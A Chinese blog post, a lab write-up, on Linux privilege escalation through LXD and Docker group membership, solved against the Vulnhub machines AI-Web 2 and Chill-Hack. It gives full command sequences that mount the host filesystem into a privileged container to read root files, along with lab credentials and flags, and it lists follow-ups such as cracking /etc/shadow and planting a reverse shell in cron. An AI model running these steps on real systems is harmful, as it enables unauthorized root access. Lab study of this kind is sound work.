关于Linux环境下的LXD及Docker提权

最新推荐文章于 2024-05-29 00:21:04 发布
最新推荐文章于 2024-05-29 00:21:04 发布
阅读量1.6k 收藏 14
点赞数 29
分类专栏: 权限提升 文章标签: lxd docker linux提权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_46081990/article/details/136922809
版权

 希望和各位大佬一起学习,如果文章内容有错请多多指正,谢谢!  

个人博客链接:CH4SER的个人BLOG – Welcome To Ch4ser's Blog

0x01 基本概念

        LXD、LXC 和 Docker 是三种不同的容器化技术,它们在实现和使用上有一些区别。
总结来说,LXD是基于LXC的系统级容器管理器,提供了更高级别的接口和管理工具;LXC是Linux内核提供的一种虚拟化技术,允许在单个Linux内核上运行多个隔离的用户空间实例;而Docker是基于LXC的容器化平台,提供了一套简化容器构建、分发和运行的工具和API。

        LXD(Linux容器守护程序)是一个系统级容器管理器,它基于LXC(Linux容器)技术。LXD提供了更高级别的接口和管理工具,使得轻松创建和管理系统容器成为可能。LXD主要面向系统级容器,可以运行完整的操作系统镜像,并提供类似于虚拟机的环境。它提供了更好的隔离性、资源控制和安全性。

        LXC(Linux容器)是Linux内核提供的一种虚拟化技术,它允许在单个Linux内核上运行多个隔离的用户空间实例。LXC提供了一组工具和API,用于创建和管理容器。LXC容器通常比LXD容器更加灵活和轻量级,可以定制底层操作系统的各个方面。LXC更适合于需要更细粒度控制的使用场景。

        Docker是一个开源的容器化平台,它建立在LXC之上,并提供了一套更高级别的工具和API,使得容器的构建、分发和运行变得更加简单。Docker提供了一个容器镜像的集装箱模型,使得容器可以在不同的环境中进行移植和部署。Docker强调容器的可移植性和易用性,适用于开发、测试和部署应用程序的场景。

0x02 LXD 提权

1、原理
LXD 是基于 LXC 容器的管理程序,当前用户可操作容器。所以用户可创建一个容器,再用容器挂载宿主机磁盘,最后使用容器权限操作宿主机磁盘内容达到提权效果。
2、LXD 提权条件

  • 已经获得 shell
  • 用户属于 lxd 组

3、案例 - Vulnhub - AI-Web

AI-Web 靶机下载地址:https://www.vulnhub.com/entry/ai-web-2,357/

前期 Web 打点拿到了 ssh 账号密码,如下:

User: n0nr00tuser
Pass: zxowieoi4sdsadpEClDws1sf

ssh 连接后发现当前用户 n0nr00tuser 属于 lxd 组,也就是说可以操作 LXD 容器

┌──(root㉿ch4ser)-[~]
└─# ssh n0nr00tuser@192.168.196.144
n0nr00tuser@aiweb2host:~$ whoami
n0nr00tuser
n0nr00tuser@aiweb2host:~$ id
uid=1001(n0nr00tuser) gid=1001(n0nr00tuser) groups=1001(n0nr00tuser),108(lxd)
n0nr00tuser@aiweb2host:~$ pwd
/home/n0nr00tuser

Kali 开启 apache2 服务,将镜像 alpine-v3.13-x86_64-20210218_0139.tar.gz 放到网站根目录

┌──(root㉿ch4ser)-[~]
└─# cd /var/www/html
                                                                                                                                                                                                                   
┌──(root㉿ch4ser)-[/var/www/html]
└─# ls             
alpine-v3.13-x86_64-20210218_0139.tar.gz
                                                                                                                                                                                                                   
┌──(root㉿ch4ser)-[/var/www/html]
└─# service apache2 start

 靶机 wget 下载,使用 lxc 创建容器并别名为 test

n0nr00tuser@aiweb2host:~$ wget http://192.168.196.128/alpine-v3.13-x86_64-20210218_0139.tar.gz
n0nr00tuser@aiweb2host:~$ lxc image import ./alpine-v3.13-x86_64-20210218_0139.tar.gz --alias test
Image imported with fingerprint: cd73881adaac667ca3529972c7b380af240a9e3b09730f8c8e4e6a23e1a7892b

初始化容器 test 并设置选项 security.privileged=true,即允许容器以特权模式运行

n0nr00tuser@aiweb2host:~$ lxc init test test -c security.privileged=true
Creating test

将宿主机的根目录 "/" 挂载到容器中的 "/mnt/root" 目录,recursive=true 选项表示在添加设备时递归创建目标路径

n0nr00tuser@aiweb2host:~$ lxc config device add test test disk source=/ path=/mnt/root recursive=true
Device test added to test

启动容器 test 并打开一个 shell 会话,可以看到当前权限为容器的 root 权限(注意:不是宿主机的 root 权限)

n0nr00tuser@aiweb2host:~$ lxc start test
n0nr00tuser@aiweb2host:~$ lxc exec test /bin/sh
~ # whoami
root
~ # id
uid=0(root) gid=0(root)
~ # pwd
/root

此时我们对容器具有最高权限,而宿主机的目录已全部递归挂载到 /mnt/root,所以只需要进入 /mnt/root/root 目录查看便可得到 flag

~ # cd /mnt/root/root
/mnt/root/root # ls
flag.txt
/mnt/root/root # cat flag.txt 
####################################################
#                                                  #
#                 AI: WEB 2.0                      #
#                                                  #
#               Congratulation!!!                  #
#                                                  #
#             Hope you enjoyed this.               #
#                                                  #
#  flag{7fe64512ecd4dba377b50627f307d1678b14132f}  #
#                                                  #
#         Please tweet on @arif_xpress             #
#                                                  #
####################################################

 0x03 Docker 提权

1、原理
Docker 提权和 LXD 提权原理基本一致,都是通过挂载宿主机磁盘,最后使用容器权限操作宿主机磁盘内容达到提权效果。
2、LXD 提权条件

  • 已经获得 shell
  • 用户属于 docker 组

3、案例 - Vulnhub - Chill-Hack

Chill-Hack 靶机下载地址:https://www.vulnhub.com/entry/chill-hack-1,622/

前期 Web 打点拿到了 ssh 账号密码,如下: 

User: anurodh
Pass: !d0ntKn0wmYp@ssw0rd

ssh 连接后发现当前用户 anurodh 属于 docker 组,也就是说可以操作 Docker 容器

┌──(root㉿ch4ser)-[~]
└─# ssh anurodh@192.168.196.145
anurodh@ubuntu:~$ whoami
anurodh
anurodh@ubuntu:~$ id
uid=1002(anurodh) gid=1002(anurodh) groups=1002(anurodh),999(docker)
anurodh@ubuntu:~$ pwd
/home/anurodh

拉取镜像,创建容器,将宿主机的根目录 "/" 挂载到容器中的 "/mnt" 目录,进入 /mnt/root 目录查看便可得到 flag`

anurodh@ubuntu:~$ whoami
anurodh
anurodh@ubuntu:~$ id
uid=1002(anurodh) gid=1002(anurodh) groups=1002(anurodh),999(docker)
anurodh@ubuntu:~$ pwd
/home/anurodh
anurodh@ubuntu:~$ docker run -v /:/mnt -it alpine
/ # whoami
root
/ # id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)
/ # pwd
/
/ # cd /mnt/root
/mnt/root # ls
proof.txt
/mnt/root # cat proof.txt 


					{ROOT-FLAG: w18gfpn9xehsgd3tovhk0hby4gdp89bg}


Congratulations! You have successfully completed the challenge.

0x04 补充

上述提权方案只是对宿主机目录有了操作权限,如果此时反弹 shell 得到的权限将是容器内的 root 权限,而非宿主机的 root 权限,显然不是我们想要的。

那么如何得到宿主机的 root 权限呢?有以下几种方法参考:

1、破解 /etc/shadow 中的 hash,得到 root 账户密码,可使用 hashcat 等工具

2、添加 ssh 密钥绑定 root,之后使用 ssh 密钥登录 root

3、将反弹 shell 命令写到宿主机的计划任务,此时反弹的是宿主机root权限(推荐)

4、利用 CVE 漏洞直接利用反弹

Ch4ser
关注
  • 29
    点赞
  • 14
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
linux-devops:有用Linux工具,配置示例
03-21
# install: curl https://www.teleconsole.com/get.sh | sh # start service: teleconsole # client connect: teleconsole join < session> # access through web: ...资料来源: :
lxdock:使用LXD构建和协调您的开发环境-又名Vagrant is Too Heavy:trade_mark:
02-03
LXDLinux Containers Daemon)是Ubuntu开发的一款轻量级容器管理系统,它基于Linux内核的容器技术如cgroups和namespaces,为用户提供了一个高效且安全的方式来运行分布式应用程序。LXD不同于传统的Docker,它更...
多人共用GPU服务器LXD安装
Ghlerrix的博客
10-26 1924
LXD安装教程
Linux上的多系统管理工具--LXD
ghost0zxc的博客
01-31 5916
文章目录1 LXD简介1.1 容器技术1.2 LXC与Docker2 镜像(image)2.1 镜像2.2 指令3 容器(container)3.1 容器与快照3.2 常用指令4 存储(storage)(可选)文件管理ZFS5 配置组端口GPU与CUDA(留坑)参考与工具 1 LXD简介 1.1 容器技术 使用 Linux 容器而不是硬件虚拟化向用户提供一种接近虚拟机的使用体验。 1.2 LXC与Docker LXD是LXC的升级,更加易用以及方便主机间的通信。 LXD更注重系统容器,即运行一个完整的Lin
[docker] docker 安全知识 - docker api, 权限提升 & 资源管理
最新发布
GoldenaArcher的博客
05-29 1206
这是 docker 安全的最后一篇。
LXD 2.0 系列(一):LXD 入门
Free雅轩的博客
11-27 2723
当构建最终容器配置时(即通常的扩展配置),这些配置文件都会按照他们定义顺序被应用到容器上,当有重名的配置键或设备时,新的会覆盖掉旧的。相对的, Docker 关注于短期的、无状态的、最小化的容器,这些容器通常并不会升级或者重新配置,而是作为一个整体被替换掉。值得注意的是,因为我们允许用户保存容器的运行时状态,这就有效的为我们提供了“有状态”的快照的功能。LXD 是基于镜像实现的,所有的 LXD 容器都是来自于镜像。LXC 成功的实现了它的目标,它提供了一系列很棒的用于创建和管理容器的底层工具和库。
docker提权
Longwaer
01-01 3416
通过靶场实验环境,更加深入了解docker提权原理及使用方法,提升个人对linux提权方法的掌握及运用。
docker、LXC、LXD的区别及传统的虚拟机与操作系统虚拟化的区别
penriver的博客
12-11 3894
docker、LXC、LXD的区别及传统的虚拟机与操作系统虚拟化的区别
Docker、LXC、LXD这三种容器的区别
热门推荐
筋斗云计算
03-01 5万+
在部署完成CORD 环境中, 既有docker containers ,又有LXD/LXC containers。我便查阅了资料学习一下,并对它们的区别进行一个小结 LXC和LXD 在介绍LXD之前先介绍LXC,因为LXD可以视作LXC的升级版。LXD的管理命令和LXC的管理命令大多相同。 LXC起源于cgroup和namespaces,使得进程之间相互隔离,即进程虚拟化。 LXC有一...
docker (1) 附加 基础知识必知(重要)
01-20
 lxc是Linux上老牌的容器runtime。Docker最初也是用lxc作为runtime的。  runc是Docker自己开发的runtime。目前Docker的默认runtime。符合oci规范。  rkt是CoreOS开发的容器runtime。符合oci规范,因而能够运行...
水族馆:用于本地多节点Kubernetes开发的高度以Linux为中心的支架
02-16
Aquarium的设计目标是利用Docker(使用k3s / k3d)或LXD(通过Kubedee使用适当的Kubernetes)提供相对轻巧的支架,以在本地计算机上启动多节点Kubernetes开发环境,同时尝试解决一些难题。这样。 用法 aquarium - ...
ansible-collection-linux
03-31
- name : community.general - name : community.docker包含的内容的角色FQDN名称文献资料建置状态bonddim.linux.lxd bonddim.linux.snapd bonddim.linux.docker bonddim.linux.traefik使用这个集合在使用常规社区...
x9chroot:创建和/或进入一个简单的chroot环境进行测试
02-14
例如,LXDDocker容器太重且功能齐全。 同样,实际上不能创建具有常见Linux发行版的虚拟机,这实际上是一个准系统。 chroot进入chroot环境并以您自己的无特权用户身份到达也有一定困难。 (可以找到答案,但...
Python库 | nova_lxd-14.2.0-py2-none-any.whl
03-22
`nova_lxd`则是OpenStack的计算组件Nova与轻量级容器技术LXDLinux Container Host)的集成,允许用户在LXD容器中运行虚拟机实例。 LXD是Ubuntu开发的一个系统容器管理器,提供了一种安全、高性能的方式来运行...
fog05:端到端计算,存储和网络虚拟化
02-05
LXD则是基于Linux容器的管理系统,提供了更高级别的安全性和资源隔离,适用于需要更高性能的应用场景。 KVM(Kernel-based Virtual Machine)是一种全虚拟化技术,它允许在一个单一的物理主机上运行多个独立的操作...
CheatSheets:信息收集与组织
03-18
备忘单资源-很棒的单行脚本集合,特别是关于错误赏金技巧的集合。 创建OWASP的Cheat Sheet系列是为了提供有关特定应用程序安全性主题的高价值信息的简洁集合。
linux定时任务打包提权&docker提权
m0_62207170的博客
03-03 689
linux定时任务打包提权&docker提权
lxd提权
longwanlian的博客
11-25 830
https://www.cnblogs.com/hirak0/p/16111530.html
【红队靶场】利用redis未授权写入,docker提权逃逸,ms17-010,横向拿下域控
人间体佐菲的博客
05-04 729
docker,渗透测试,网络安全,信息安全,域,靶场
lxddocker的对比
06-07
LXDDocker都是容器化技术的实现工具,但它们有一些不同之处。以下是它们之间的主要对比: 1. 级别 LXD是一个系统容器管理器,而Docker是一个应用容器管理器。系统容器是一个更高级别的虚拟化形式,它可以提供更完整的Linux系统环境,而应用容器只提供应用程序运行所需的最小环境。 2. 架构与运行方式 LXD是一个守护进程,需要在主机上运行,它可以管理多个容器。而Docker也是一个守护进程,但它还提供了客户端工具,可以在主机上管理多个Docker守护进程。 3. 安全性 LXD提供了一些额外的安全机制,如密钥管理和硬件加速,可以提高容器的安全性。而Docker也提供了一些安全机制,如容器隔离和镜像签名。 4. 性能 LXD可以提供更好的性能,因为它使用LXC(Linux容器)技术,这种技术在系统层面提供了更好的容器隔离和资源管理。而Docker则使用了更加轻量级的容器隔离技术,如命名空间和控制组。 5. 用途 LXD主要用于虚拟化和容器化整个系统,可以提供类似于虚拟机的环境,因此适用于运行多个相互隔离的应用。而Docker主要用于容器化单个应用程序,因此适用于构建和部署应用程序。 总的来说,LXD适用于需要更高级别虚拟化环境的场景,如虚拟化整个系统或运行多个相互隔离的应用;而Docker适用于构建和部署单个应用程序的场景。同时,LXD也提供了一些额外的安全和性能机制,但需要更多的资源和配置,而Docker则更加轻量级和易于使用。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值